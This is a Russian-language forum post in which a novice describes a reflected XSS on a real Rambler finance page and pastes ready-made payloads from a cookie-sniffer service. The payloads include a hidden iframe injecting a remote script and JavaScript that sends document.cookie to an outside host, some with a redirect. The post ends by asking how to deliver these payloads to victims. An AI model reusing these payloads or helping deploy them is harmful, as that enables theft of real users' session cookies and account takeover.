25isb2010
Сообщений: 2
Оценки: 0
Присоединился: 2011-11-10 10:30:20.003333
|
Значит такая проблема…
Решил я узнать получше что такое XSS, прочитал статьи, заинтересовало решил попробовать, взял уже найденную пассивную XSS на рамблере (сам скриптами не смог найти[:(] или руки корявые или голова не варит, а может быть не там ищу! [&:] ). Ну вообщем зарегистрировался на сайте https://hacker-pro.net/sniffer в сниффере. Вставил туда взятую на форуме XSS и вставил в окошечко где пассивная XSS (вот она…: http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest=%22%22<%27%3E)
поставил url на редирект: http://vkbugs.ru всё это сохранил.
Вот мне выдало дальше…
url для пассивной XSS: http://httpz.ru/5f3zitfqjuq
Код размещения xss фрейма на странице: <iframe src='http://finance.rambler.ru/calculators/hypothec/?sum=56&years=6546&interest=%22%22<%27%3E%3CSCRIPT type=text/javascript src=http://httpz.ru/5f3zitfqjugo.js></SCRIPT>"' width='0' height='0' style='display:none'></iframe>
Код для пассивной XSS атаки: %3CSCRIPT type=text/javascript src=http://httpz.ru/5f3zitfqjugo.js></SCRIPT>"
html код: <img src="http://httpz.ru/n5f3zitfqju.gif">
bb код: 
JavaScript код: <script>
img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie;
</script>
JavaScript код с редиректом: <script>
img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie;
// редирект через 3 сек.
var URL = "http://vkbugs.ru"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>
JavaScript код для адресной строки: javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie;</script>')
JavaScript код для адресной строки c редиректом: javascript:document.write('<script>img = new Image(); img.src = "http://httpz.ru/n5f3zitfqju.gif?"+document.cookie;var URL = "http://vkbugs.ru";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);</script>')
Подскажите пожалуйста что мне делать дальше с этим со всем!? Что из этого выбрать? И для каких целей нужны все эти разные коды? Куда вставлять? И как пользоваться? И как вообще применить?
Если кому не сложно ответить, подскажите мне пожалуйста, опишите подробно как с этим со всем управляться чтобы всё получилось. Нужно ли мне создавать сайт на бесплатном хостинге? Или по почте можно это как нибудь отправить?
|
Ребята подскажите и выручите - 
